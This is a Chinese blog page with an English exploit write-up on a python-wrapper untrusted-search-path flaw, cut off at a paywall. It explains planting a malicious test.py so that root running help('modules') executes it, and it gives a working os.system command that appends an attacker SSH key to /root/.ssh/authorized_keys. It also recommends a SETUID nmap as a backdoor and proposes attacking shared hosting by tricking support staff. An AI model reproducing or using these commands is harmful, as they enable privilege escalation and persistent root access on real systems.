这篇博客揭示了一个 Python-wrapper 的安全漏洞,允许非特权用户通过构造恶意 `test.py` 脚本,诱使具有 root 权限的用户执行 `help('modules')` 命令,从而执行任意代码。攻击者可以利用此漏洞在受害者的环境中植入后门,例如修改 `/root/.ssh/authorized_keys` 文件,实现权限提升。此外,还讨论了如何利用 nmap 进行类似的攻击,并提供了一个共享主机环境的攻击场景示例。
# python-wrapper untrusted search path/code execution vulnerability
#
# Python-wrapper executes any test.py script within the current working directory, when supplied with help('modules').
# A non-priviledged user may gain code execution by tricking root to help('modules') or help() and then modules from within python-wrapper
# while within a non-priviledged user's work directory.
#
# The evil file MUST be titled test.py! os.system("evilcommand") will result in python-wrapper executing said command, and then continuing normally
# with no signs of compromise if you redirect command output. os.system("/bin/echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys") does not
# work, however os.system("/bin/echo $(echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys)") does.
#
#
# Additionally, nmap makes a great backdoor from a non-priviledged user account because it's something that looks like you might actually
# want SETUID under certain circumstances, but not really(and it will bitch if invoked). In nmap 5.31DC1 the most useful switch(--interactive) was removed
# which previously allowed you to bang out a shell(!/bin/csh, but not bash). Thank you David/Juan Carlos Castro for breaking one of my favorites.
# NOW however there is the nmap scripting engine to exploit. As usual, the input-output commands will behave like any exploitable SETUID program
# with input-output commands.
#
#
# A practical example of how this vulnerability could be useful is if you wish to attack a shared webhosting enviornment.
# After convincing root(support) to cd in t
最低0.47元/天 解锁文章
630
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
